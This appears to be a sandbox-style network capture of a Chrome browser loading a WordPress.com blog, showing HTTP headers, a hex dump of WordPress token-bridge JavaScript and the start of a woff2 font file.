                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC497OUTGET /_static/??/wp-content/js/rlt-proxy.js,/wp-content/mu-plugins/jetpack-plugin/sun/jetpack_vendor/automattic/jetpack-videopress/build/lib/token-bridge.js?m=1724856138j HTTP/1.1
                                                                                                                                                                                                                                                                  Host: s0.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC483INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:43 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                                                                                                                  Content-Length: 15575
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Last-Modified: Wed, 28 Aug 2024 14:42:34 GMT
                                                                                                                                                                                                                                                                  Etag: "66cf375a-3cd7"
                                                                                                                                                                                                                                                                  Expires: Thu, 28 Aug 2025 15:00:15 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                  X-ac: 4.dfw _dfw MISS
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  X-nc: HIT dfw 2
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC886INData Raw: 2f 2f 20 6c 69 73 74 65 6e 20 66 6f 72 20 72 6c 74 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 65 76 65 6e 74 73 20 61 6e 64 20 70 61 73 73 20 74 68 65 6d 20 74 6f 20 63 68 69 6c 64 72 65 6e 20 6f 66 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 0a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 76 61 72 20 63 75 72 72 65 6e 74 54 6f 6b 65 6e 3b 0a 09 76 61 72 20 70 61 72 65 6e 74 4f 72 69 67 69 6e 3b 0a 09 76 61 72 20 69 66 72 61 6d 65 4f 72 69 67 69 6e 73 3b 0a 09 76 61 72 20 72 65 67 69 73 74 65 72 65 64 49 66 72 61 6d 65 73 20 3d 20 5b 5d 3b 0a 09 76 61 72 20 69 6e 69 74 69 61 6c 69 7a 61 74 69 6f 6e 4c 69 73 74 65 6e 65 72 73 20 3d 20 5b 5d 3b 0a 09 76 61 72 20 68 61 73 42 65 65 6e 49 6e 69 74 69 61 6c 69 7a 65 64 20 3d 20 66 61 6c 73 65 3b 0a 09
                                                                                                                                                                                                                                                                  Data Ascii: // listen for rlt authentication events and pass them to children of this document.( function() {var currentToken;var parentOrigin;var iframeOrigins;var registeredIframes = [];var initializationListeners = [];var hasBeenInitialized = false;
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 2a 20 50 55 42 4c 49 43 20 4d 45 54 48 4f 44 53 0a 09 20 2a 2f 0a 09 77 69 6e 64 6f 77 2e 72 6c 74 49 6e 76 61 6c 69 64 61 74 65 54 6f 6b 65 6e 20 3d 20 66 75 6e 63 74 69 6f 6e 28 20 74 6f 6b 65 6e 2c 20 73 6f 75 72 63 65 4f 72 69 67 69 6e 20 29 20 7b 0a 09 09 2f 2f 20 69 6e 76 61 6c 69 64 61 74 65 20 69 6e 20 63 75 72 72 65 6e 74 20 63 6f 6e 74 65 78 74 0a 09 09 69 66 20 28 20 74 6f 6b 65 6e 20 3d 3d 3d 20 63 75 72 72 65 6e 74 54 6f 6b 65 6e 20 29 20 7b 0a 09 09 09 63 75 72 72 65 6e 74 54 6f 6b 65 6e 20 3d 20 6e 75 6c 6c 3b 0a 09 09 7d 0a 0a 09 09 2f 2f 20 72 65 6d 6f 76 65 20 66 72 6f 6d 20 6c 6f 63 61 6c 73 74 6f 72 61 67 65 2c 20 62 75 74 20 6f 6e 6c 79 20 69 66 20 69 6e 20 61 20 74 6f 70 20 6c 65 76 65 6c 20 77 69 6e 64 6f 77 2c 20 6e 6f 74 20 69 66
                                                                                                                                                                                                                                                                  Data Ascii: * PUBLIC METHODS */window.rltInvalidateToken = function( token, sourceOrigin ) {// invalidate in current contextif ( token === currentToken ) {currentToken = null;}// remove from localstorage, but only if in a top level window, not if
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 3b 0a 09 09 09 7d 20 63 61 74 63 68 20 28 20 65 72 72 20 29 20 7b 0a 09 09 09 09 72 65 74 75 72 6e 3b 0a 09 09 09 7d 0a 09 09 7d 0a 09 7d 3b 0a 0a 09 77 69 6e 64 6f 77 2e 72 6c 74 49 73 41 75 74 68 65 6e 74 69 63 61 74 65 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 72 65 74 75 72 6e 20 21 21 20 63 75 72 72 65 6e 74 54 6f 6b 65 6e 3b 0a 09 7d 3b 0a 0a 09 77 69 6e 64 6f 77 2e 72 6c 74 47 65 74 54 6f 6b 65 6e 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 72 65 74 75 72 6e 20 63 75 72 72 65 6e 74 54 6f 6b 65 6e 3b 0a 09 7d 3b 0a 0a 09 77 69 6e 64 6f 77 2e 72 6c 74 41 64 64 49 6e 69 74 69 61 6c 69 7a 61 74 69 6f 6e 4c 69 73 74 65 6e 65 72 20 3d 20 66 75 6e 63 74 69 6f 6e 28 20 6c 69 73 74 65 6e 65 72 20 29 20 7b 0a 09 09 2f 2f 20 69 66 20
                                                                                                                                                                                                                                                                  Data Ascii: ;} catch ( err ) {return;}}};window.rltIsAuthenticated = function() {return !! currentToken;};window.rltGetToken = function() {return currentToken;};window.rltAddInitializationListener = function( listener ) {// if
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 72 6f 62 61 62 6c 79 20 62 6c 6f 63 6b 65 64 20 74 68 69 72 64 2d 70 61 72 74 79 20 61 63 63 65 73 73 22 2c 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 0a 09 09 7d 0a 0a 09 09 2f 2f 20 6c 69 73 74 65 6e 20 66 6f 72 20 52 4c 54 20 65 76 65 6e 74 73 20 66 72 6f 6d 20 61 70 70 72 6f 76 65 64 20 6f 72 69 67 69 6e 73 0a 09 09 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 20 27 6d 65 73 73 61 67 65 27 2c 20 66 75 6e 63 74 69 6f 6e 28 20 65 20 29 20 7b 0a 09 09 09 76 61 72 20 6d 65 73 73 61 67 65 20 3d 20 65 20 26 26 20 65 2e 64 61 74 61 3b 0a 09 09 09 69 66 20 28 20 74 79 70 65 6f 66 20 6d 65 73 73 61 67 65 20 3d 3d 3d 20 27 73 74 72 69 6e 67 27 20 29 20 7b 0a 09 09 09 09 74 72 79 20 7b 0a 09 09 09 09 09 6d 65
                                                                                                                                                                                                                                                                  Data Ascii: robably blocked third-party access", window.location.href);}// listen for RLT events from approved originswindow.addEventListener( 'message', function( e ) {var message = e && e.data;if ( typeof message === 'string' ) {try {me
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 20 63 75 72 72 65 6e 74 54 6f 6b 65 6e 20 29 20 7b 0a 09 09 09 09 09 09 09 72 6c 74 49 6e 6a 65 63 74 54 6f 6b 65 6e 28 20 63 75 72 72 65 6e 74 54 6f 6b 65 6e 2c 20 65 2e 73 6f 75 72 63 65 2c 20 65 2e 6f 72 69 67 69 6e 20 29 3b 0a 09 09 09 09 09 09 7d 0a 09 09 09 09 09 7d 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 7d 20 29 3b 0a 0a 09 09 69 6e 69 74 69 61 6c 69 7a 61 74 69 6f 6e 4c 69 73 74 65 6e 65 72 73 2e 66 6f 72 45 61 63 68 28 20 66 75 6e 63 74 69 6f 6e 28 20 6c 69 73 74 65 6e 65 72 20 29 20 7b 0a 09 09 09 6c 69 73 74 65 6e 65 72 28 20 63 75 72 72 65 6e 74 54 6f 6b 65 6e 20 29 3b 0a 09 09 7d 20 29 3b 0a 0a 09 09 69 6e 69 74 69 61 6c 69 7a 61 74 69 6f 6e 4c 69 73 74 65 6e 65 72 73 20 3d 20 5b 5d 3b 0a 0a 09 09 2f 2f 20 69 6e 66 6f 72 6d 20 74 68 65 20
                                                                                                                                                                                                                                                                  Data Ascii: currentToken ) {rltInjectToken( currentToken, e.source, e.origin );}}}}} );initializationListeners.forEach( function( listener ) {listener( currentToken );} );initializationListeners = [];// inform the
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 6d 65 6e 74 26 26 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 73 74 79 6c 65 26 26 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 73 74 79 6c 65 2e 57 65 62 6b 69 74 41 70 70 65 61 72 61 6e 63 65 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 63 6f 6e 73 6f 6c 65 26 26 28 77 69 6e 64 6f 77 2e 63 6f 6e 73 6f 6c 65 2e 66 69 72 65 62 75 67 7c 7c 77 69 6e 64 6f 77 2e 63 6f 6e 73 6f 6c 65 2e 65 78 63 65 70 74 69 6f 6e 26 26 77 69 6e 64 6f 77 2e 63 6f 6e 73 6f 6c 65 2e 74 61 62 6c 65 29 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6e 61 76 69
                                                                                                                                                                                                                                                                  Data Ascii: ment&&document.documentElement&&document.documentElement.style&&document.documentElement.style.WebkitAppearance||"undefined"!=typeof window&&window.console&&(window.console.firebug||window.console.exception&&window.console.table)||"undefined"!=typeof navi
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 30 30 39 39 22 2c 22 23 46 46 30 30 43 43 22 2c 22 23 46 46 30 30 46 46 22 2c 22 23 46 46 33 33 30 30 22 2c 22 23 46 46 33 33 33 33 22 2c 22 23 46 46 33 33 36 36 22 2c 22 23 46 46 33 33 39 39 22 2c 22 23 46 46 33 33 43 43 22 2c 22 23 46 46 33 33 46 46 22 2c 22 23 46 46 36 36 30 30 22 2c 22 23 46 46 36 36 33 33 22 2c 22 23 46 46 39 39 30 30 22 2c 22 23 46 46 39 39 33 33 22 2c 22 23 46 46 43 43 30 30 22 2c 22 23 46 46 43 43 33 33 22 5d 2c 74 2e 6c 6f 67 3d 63 6f 6e 73 6f 6c 65 2e 64 65 62 75 67 7c 7c 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 7c 7c 28 28 29 3d 3e 7b 7d 29 2c 65 2e 65 78 70 6f 72 74 73 3d 6e 28 33 32 31 32 29 28 74 29 3b 63 6f 6e 73 74 7b 66 6f 72 6d 61 74 74 65 72 73 3a 72 7d 3d 65 2e 65 78 70 6f 72 74 73 3b 72 2e 6a 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                                                                                                  Data Ascii: 0099","#FF00CC","#FF00FF","#FF3300","#FF3333","#FF3366","#FF3399","#FF33CC","#FF33FF","#FF6600","#FF6633","#FF9900","#FF9933","#FFCC00","#FFCC33"],t.log=console.debug||console.log||(()=>{}),e.exports=n(3212)(t);const{formatters:r}=e.exports;r.j=function(e
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 74 61 63 6b 7c 7c 65 2e 6d 65 73 73 61 67 65 3b 72 65 74 75 72 6e 20 65 7d 2c 74 2e 64 69 73 61 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 5b 2e 2e 2e 74 2e 6e 61 6d 65 73 2e 6d 61 70 28 6f 29 2c 2e 2e 2e 74 2e 73 6b 69 70 73 2e 6d 61 70 28 6f 29 2e 6d 61 70 28 28 65 3d 3e 22 2d 22 2b 65 29 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 3b 72 65 74 75 72 6e 20 74 2e 65 6e 61 62 6c 65 28 22 22 29 2c 65 7d 2c 74 2e 65 6e 61 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 6e 3b 74 2e 73 61 76 65 28 65 29 2c 74 2e 6e 61 6d 65 73 70 61 63 65 73 3d 65 2c 74 2e 6e 61 6d 65 73 3d 5b 5d 2c 74 2e 73 6b 69 70 73 3d 5b 5d 3b 63 6f 6e 73 74 20 72 3d 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 65 3a 22 22 29 2e 73 70 6c 69 74
                                                                                                                                                                                                                                                                  Data Ascii: tack||e.message;return e},t.disable=function(){const e=[...t.names.map(o),...t.skips.map(o).map((e=>"-"+e))].join(",");return t.enable(""),e},t.enable=function(e){let n;t.save(e),t.namespaces=e,t.names=[],t.skips=[];const r=("string"==typeof e?e:"").split
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 65 63 6f 6e 64 73 3f 7c 73 65 63 73 3f 7c 73 7c 6d 69 6e 75 74 65 73 3f 7c 6d 69 6e 73 3f 7c 6d 7c 68 6f 75 72 73 3f 7c 68 72 73 3f 7c 68 7c 64 61 79 73 3f 7c 64 7c 77 65 65 6b 73 3f 7c 77 7c 79 65 61 72 73 3f 7c 79 72 73 3f 7c 79 29 3f 24 2f 69 2e 65 78 65 63 28 65 29 3b 69 66 28 21 69 29 72 65 74 75 72 6e 3b 76 61 72 20 63 3d 70 61 72 73 65 46 6c 6f 61 74 28 69 5b 31 5d 29 3b 73 77 69 74 63 68 28 28 69 5b 32 5d 7c 7c 22 6d 73 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7b 63 61 73 65 22 79 65 61 72 73 22 3a 63 61 73 65 22 79 65 61 72 22 3a 63 61 73 65 22 79 72 73 22 3a 63 61 73 65 22 79 72 22 3a 63 61 73 65 22 79 22 3a 72 65 74 75 72 6e 20 63 2a 61 3b 63 61 73 65 22 77 65 65 6b 73 22 3a 63 61 73 65 22 77 65 65 6b 22 3a 63 61 73 65 22 77 22 3a 72
                                                                                                                                                                                                                                                                  Data Ascii: econds?|secs?|s|minutes?|mins?|m|hours?|hrs?|h|days?|d|weeks?|w|years?|yrs?|y)?$/i.exec(e);if(!i)return;var c=parseFloat(i[1]);switch((i[2]||"ms").toLowerCase()){case"years":case"year":case"yrs":case"yr":case"y":return c*a;case"weeks":case"week":case"w":r
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 69 29 3b 69 66 28 6f 29 61 28 22 28 25 73 29 20 46 6c 75 73 68 69 6e 67 20 25 6f 20 74 6f 6b 65 6e 22 2c 63 2c 69 29 2c 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 72 65 6d 6f 76 65 49 74 65 6d 28 69 29 3b 65 6c 73 65 20 74 72 79 7b 69 66 28 75 29 7b 69 66 28 64 3d 61 77 61 69 74 20 4a 53 4f 4e 2e 70 61 72 73 65 28 75 29 2c 64 26 26 64 2e 65 78 70 69 72 65 3e 44 61 74 65 2e 6e 6f 77 28 29 29 72 65 74 75 72 6e 20 61 28 22 28 25 73 29 20 50 72 6f 76 69 64 69 6e 67 20 25 6f 20 74 6f 6b 65 6e 20 66 72 6f 6d 20 74 68 65 20 73 74 6f 72 65 22 2c 63 2c 69 29 2c 64 2e 64 61 74 61 3b 61 28 22 28 25 73 29 20 54 6f 6b 65 6e 20 25 6f 20 65 78 70 69 72 65 64 2e 20 43 6c 65 61 6e 2e 22 2c 63 2c 69 29 2c 6c 6f 63 61 6c 53
                                                                                                                                                                                                                                                                  Data Ascii: alStorage.getItem(i);if(o)a("(%s) Flushing %o token",c,i),localStorage.removeItem(i);else try{if(u){if(d=await JSON.parse(u),d&&d.expire>Date.now())return a("(%s) Providing %o token from the store",c,i),d.data;a("(%s) Token %o expired. Clean.",c,i),localS


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  14192.168.2.1649721192.0.77.324437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC634OUTGET /s/inter/v13/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuFuYMZ1rib2Bg-4.woff2 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: fonts.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  Origin: https://dartergary.wordpress.com
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                  Referer: https://dartergary.wordpress.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC419INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:43 GMT
                                                                                                                                                                                                                                                                  Content-Type: font/woff2
                                                                                                                                                                                                                                                                  Content-Length: 108876
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                  Age: 210101
                                                                                                                                                                                                                                                                  Last-Modified: Wed, 13 Sep 2023 23:23:00 GMT
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  X-nc: HIT dfw 2
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC950INData Raw: 77 4f 46 32 00 01 00 00 00 01 a9 4c 00 10 00 00 00 04 de 50 00 01 a8 e3 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 88 18 1b 84 dc 16 1c 81 aa 78 06 60 3f 53 54 41 54 44 00 81 ca 1a 11 08 0a 88 e4 24 87 a6 6e 0b cf 50 00 01 36 02 24 03 cf 4a 04 20 05 91 6e 07 81 c9 1e 0c 07 5b b0 56 b4 d9 52 86 bb fb 3e b4 e9 67 29 16 49 20 93 09 8b 2c 20 03 b3 a9 ce a8 ce 11 96 dd 28 16 84 13 d5 99 7f d3 54 02 13 d9 3e 4b e9 68 70 05 1d ab ea a9 6b 88 35 21 08 54 ec ac db df 3f e1 04 7a da 86 21 bf 9e 5b e3 4d 5b 71 51 79 2b ff ff ff ff ff ff ff ff ff ff ff ff ff ff df 53 f2 e3 51 a7 77 ef 4b 77 7f 68 79 c9 c1 f2 98 d8 c4 0b 0c 4e 80 60 30 21 63 35 90 36 6d c3 84 54 c5 3a 25 2f e4 83 4b a0 08 14 81 22 e6 29 65 20 cf 41 52 28 65 99 f0 5a 74
                                                                                                                                                                                                                                                                  Data Ascii: wOF2LPx`?STATD$nP6$J n[VR>g)I , (T>Khpk5!T?z![M[qQy+SQwKwhyN`0!c56mT:%/K")e AR(eZt
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: fc 86 ac 04 6d 9c 1b 68 6c fe 93 85 50 25 e4 e4 37 2d fe 67 65 ea 66 d6 f5 3b 94 06 e6 f8 5e e9 d9 d2 5d 3a f2 b9 f5 8e 46 e2 a9 91 b2 06 8d e8 d2 f4 55 ee c2 03 fb 13 e3 0f 53 ef fd 8a 3e 44 17 cc 05 2e 7f c0 41 6c bb 9f 79 21 06 2f 94 e9 56 0c 9f f8 6c c7 94 2b 79 74 36 32 6b d3 70 33 01 75 df 55 66 49 0b b2 54 dd ba ba 9b 58 f6 3c 54 50 3f 7c 2d 8e be 69 9c b1 e4 48 6d f4 87 09 e8 d3 4a 81 f6 34 7e 8b 32 3d 39 65 d3 f8 5d c2 87 eb fb 34 4d a9 46 49 fc 96 30 fd 91 a6 3c 90 8f f1 9b af 70 f2 07 8a c4 e4 39 20 8c c3 49 00 fe 22 54 29 35 a1 6b c6 5c b6 70 84 6b 78 3e 7f 91 5b ff 09 a6 f3 fd fb ff fe dd 25 a9 e3 2b a5 41 1a cc bd 4c 44 98 98 75 26 58 8b 8c 15 d5 62 c5 7d 46 27 cc ac 34 06 cf cf e9 bd f7 ff 7f 09 3f 21 84 10 42 88 13 42 90 c4 91 d2 34 98 d4
                                                                                                                                                                                                                                                                  Data Ascii: mhlP%7-gef;^]:FUS>D.Aly!/Vl+yt62kp3uUfITX<TP?|-iHmJ4~2=9e]4MFI0<p9 I"T)5k\pkx>[%+ALDu&Xb}F'4?!BB4
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 22 55 45 45 c5 d6 e3 49 13 03 e8 68 61 39 1a e0 8d 73 13 42 ad 01 12 04 88 83 43 0d f1 80 03 3c 27 14 60 01 33 cf fe fe 75 1e 3e 13 78 f1 ae e4 cd 25 2e 34 22 2f fd 90 77 fa 1c 0d 68 b9 ed 9e e2 88 54 66 f9 62 6a 86 2e ff bc bf b3 d9 3b e5 ee 0b 51 d7 19 a5 34 d0 d6 30 e0 75 b6 4b d4 6c 46 bf 73 01 e7 1b 5a 6b 5d 2e 90 2f 13 47 c4 56 0c 3e a9 86 16 ed 31 d5 3c d7 db ca d8 82 1a 60 4b 47 0a 52 2b 49 f2 5f f0 17 2d cc 87 00 5d 33 9d e0 81 4a e5 47 01 08 84 01 32 81 29 5e 52 df 96 00 07 08 ff 97 d3 fe 2b 90 2c bb aa ae 64 c5 43 b4 9b c5 66 16 9b e1 fd 1c 89 13 03 c7 ee e6 40 55 dd 01 bb 33 68 27 bb c7 ff 37 f0 27 02 4b 7e b0 7a 7f 28 30 af e4 58 c7 78 8b aa 02 96 5d 00 dc 34 cb cd 20 1d c8 9b 3c ff d0 ce 14 e3 38 fb f7 e2 f1 78 2a 2d 14 f8 07 db 95 7a e5 df
                                                                                                                                                                                                                                                                  Data Ascii: "UEEIha9sBC<'`3u>x%.4"/whTfbj.;Q40uKlFsZk]./GV>1<`KGR+I_-]3JG2)^R+,dCf@U3h'7'K~z(0Xx]4 <8x*-z
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 05 04 c8 fc 00 63 ee 7b 27 44 17 9b f3 fa 62 b4 ae d1 01 01 49 34 0c 24 71 34 6a 66 c6 1c ad 6b d1 bc 2b 1b b1 ae 48 f1 c0 2c 6f 2d e7 2b 06 4e 1c 82 1c 3c 8b 94 c8 57 66 b9 4a 19 af 79 1d cf fa e2 3e f1 0c ae c0 5d 95 98 5e b3 67 63 5a 5a b6 15 55 d9 57 f3 f3 7c 6b 73 b2 0e a7 13 3b df bc 7f 5a 5e 15 ad ff 09 84 a1 e2 04 09 52 24 43 25 86 72 99 a8 c3 4c c2 19 3d d1 f5 c6 d2 0f d7 40 52 a3 64 ba 49 b5 c7 f8 78 16 c6 87 98 96 63 5b ad d0 26 c5 4a d4 3a a8 d5 49 62 e7 48 7c a5 d7 b7 06 7d 6f 72 25 69 57 73 09 bc c0 0b 13 c2 c8 84 70 ca 46 b2 d6 3a 57 3d 08 53 06 61 71 41 58 72 10 e6 0c c2 3a 6c 74 12 a7 87 12 a3 95 19 a7 d2 44 35 ff ab 34 c3 b1 c9 ec ce 14 0b cf 6c bd f5 58 67 22 84 94 0c 48 94 c2 96 ca d6 c0 33 ef 3b 0b 30 4b 08 2b 38 ab 44 eb 64 db 0c 7b
                                                                                                                                                                                                                                                                  Data Ascii: c{'DbI4$q4jfk+H,o-+N<WfJy>]^gcZZUW|ks;Z^R$C%rL=@RdIxc[&J:IbH|}or%iWspF:W=SaqAXr:ltD54lXg"H3;0K+8Dd{
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 23 4e 6b 3e ba 74 4a 13 06 a6 3e 64 c5 e5 c8 c0 b4 e8 8b e7 94 19 0c 0c 29 2b 3a e6 29 66 0e 6b ec 2f 3e a7 0d 61 c5 24 b9 98 1e fa 01 74 1e d6 e4 e1 af ba ea 26 92 4e 11 c0 f8 68 c1 89 47 00 ed 68 53 50 ae 68 4a b1 11 46 32 be 90 f7 4c 21 99 cc 23 25 ac 22 72 36 93 4e f6 93 11 4e a5 17 b8 56 3e 27 15 43 16 e2 8e f1 21 60 0a 2e 06 0c 11 98 ae dc c8 44 47 95 c7 8c 8c 3d 63 18 bb f2 ce 90 8b d8 eb c1 bf b1 0d ed 25 ab 22 c3 1e 04 2e b4 99 c9 21 9c b2 e9 de dd dc b1 23 38 cc 6f 73 dc 51 5b 23 60 5b 38 6c 74 f2 2b ec c2 4f 4a 7d 2d 5c 6c d1 96 28 ec 8f 43 97 92 78 40 db bb ca f6 81 c7 bf df 3e 62 cd fc 96 96 2c 25 7b ca 0a ac cc 12 35 a6 a0 af d5 ae 02 19 b4 b1 d3 cd d8 d2 52 62 c3 be 30 f4 cb a1 51 d7 9c 46 1f 70 16 b2 e7 7d 80 90 66 e0 f4 11 8c a3 26 7e 9b
                                                                                                                                                                                                                                                                  Data Ascii: #Nk>tJ>d)+:)fk/>a$t&NhGhSPhJF2L!#%"r6NNV>'C!`.DG=c%".!#8osQ[#`[8lt+OJ}-\l(Cx@>b,%{5Rb0QFp}f&~
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: f1 fc c5 84 a1 48 f1 7f 35 1d a4 cc 2c 54 39 d4 2d ec ee b0 a6 21 0f 53 e6 58 d4 ca 2c db d1 e6 94 7c ea 88 93 9f 2e 4a 6f 41 9a f2 30 f1 cd a0 18 f5 46 1c 44 87 2f 1e ae f2 08 c8 41 60 73 58 22 ab 16 9c 96 1f 24 79 4a 4b 9d 8f 24 24 b5 4d 15 5d 81 6c 6a 69 6b e7 82 e2 3c 44 07 d9 76 d3 94 14 9d 2d 69 8e f5 e6 35 c2 ba 4b 91 b0 9c 70 c4 2b 27 18 f4 12 58 5f ad 27 d6 57 fd c4 08 f0 e1 a3 87 9e d9 6c 8c 0a ac dc ea 9f 64 c0 b8 b9 99 d6 e3 3d f4 cc 66 0c 0d ca d4 6f 50 8c 98 cc 6a 01 e4 ea 49 a0 33 6a a6 39 3b 25 29 ca c7 82 3d 13 7c ac ad ee 57 6d 18 07 b5 ed 41 55 b5 e8 5a c4 e8 98 72 f9 e6 cf f8 ea aa a6 58 5f 6d 2e 43 e6 bc 31 02 12 24 98 ee 4b 76 67 d3 30 6b dc 18 07 40 db 55 07 fb 83 ad c3 4c fb 59 64 a1 5f ef 1a ca ca 15 8e 12 13 12 a7 04 52 0c 09 f2
                                                                                                                                                                                                                                                                  Data Ascii: H5,T9-!SX,|.JoA0FD/A`sX"$yJK$$M]ljik<Dv-i5Kp+'X_'Wld=foPjI3j9;%)=|WmAUZrX_m.C1$Kvg0k@ULYd_R
